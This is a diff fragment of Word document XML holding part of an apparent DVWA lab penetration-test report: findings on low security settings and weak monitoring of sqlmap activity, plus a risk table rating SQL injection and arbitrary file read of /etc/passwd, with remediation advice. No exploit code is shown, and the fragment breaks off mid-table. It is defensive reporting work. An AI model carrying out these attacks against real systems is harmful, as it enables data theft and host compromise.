+        </w:rPr>
+        <w:t>security=low</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> — for DVWA labs this is expected, but in production this indicates insecure controls.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: trivial exploitation and complete compromise of app logic.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+        </w:rPr>
+        <w:t>Insufficient monitoring and detection (implied)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Evidence: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ran for a while and performed many attempts; logs show repeated activity — if this were real environment, lack of blocking/alerting allowed it to continue.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Impact vector: prolonged undetected exfiltration.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="504"/>
+        <w:tblW w:w="11311" w:type="dxa"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2208"/>
+        <w:gridCol w:w="1568"/>
+        <w:gridCol w:w="855"/>
+        <w:gridCol w:w="1086"/>
+        <w:gridCol w:w="4645"/>
+        <w:gridCol w:w="467"/>
+        <w:gridCol w:w="482"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="199"/>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Finding</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Impact vector</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Likelihood</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Remediation (short)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Effort</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Priority</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="600"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>1. SQL Injection (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>boolean</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>/error/time/UNION)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Data exfiltration; auth bypass; change DB data</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Very High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Critical</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Use parameterized queries / prepared statements everywhere; replace dynamic SQL with stored procedures or ORM; rigorous input validation; add unit tests for query paths.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="636"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>2. Arbitrary file read (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>/etc/passwd</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> shown)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Sensitive host info disclosure → enables targeted attacks</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>High</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Remove DB account FILE privileges; set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>secure_file_priv</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> to safe directory; disable </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>LOAD_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>FILE(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> if not used; audit queries that can read filesystem.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>Medium</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:jc w:val="right"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+              <w:t>P0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="820"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="12"/>
+                <w:szCs w:val="12"/>
+                <w:lang w:eastAsia="en-IN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
